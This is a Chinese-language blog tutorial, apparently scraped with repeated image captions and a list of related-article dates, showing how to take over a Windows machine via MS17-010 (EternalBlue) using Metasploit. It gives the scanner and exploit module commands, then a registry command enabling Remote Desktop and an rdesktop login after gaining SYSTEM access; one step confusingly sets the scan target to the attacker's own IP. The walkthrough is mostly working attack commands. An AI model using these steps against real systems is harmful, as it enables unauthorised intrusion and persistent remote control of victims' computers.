---恢复内容开始---

Step1:开启postgresql数据库;

/etc/init.d/postgresql start

使用MSF通过MS17-010获取系统权限

 Step2:进入MSF中,搜索cve17-010相关的exp;

search 17-010

使用MSF通过MS17-010获取系统权限

   其中,auxiliary/scanner/smb/smb_ms17_010  是扫描漏洞是否存在的辅助工具

     exploit/windows/smb/ms17_010_eternalblue 是用来攻击的 exp

Step3:探测漏洞是否存在

  1、查看rhosts、rpost

use auxiliary/scanner/smb/smb_ms17_010 
show options

使用MSF通过MS17-010获取系统权限

   2、设置rhosts为靶机的网段,rpost为445端口;

set rhosts 攻击者的IP
exploit

使用MSF通过MS17-010获取系统权限

 Step4:攻击靶机

use  exploit/windows/smb/ms17_010_eternalblue
set rhosts 靶机的IP exploit

使用MSF通过MS17-010获取系统权限

 

 使用MSF通过MS17-010获取系统权限

 Step5:攻击成功后就能获取目标的system权限,创建新用户,开启3389端口

REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f 

使用MSF通过MS17-010获取系统权限

 使用MSF通过MS17-010获取系统权限

 Step6:远程登录目标机

rdesktop  目标ip

使用MSF通过MS17-010获取系统权限

 

 成功登录目标机

 

相关文章:

  • 2022-02-06
  • 2021-12-07
  • 2021-05-22
  • 2022-12-23
  • 2022-02-06
  • 2021-09-30
  • 2021-09-10
猜你喜欢
  • 2021-10-19
  • 2021-12-24
  • 2021-10-26
  • 2021-04-02
  • 2021-12-27
  • 2021-09-22
相关资源
相似解决方案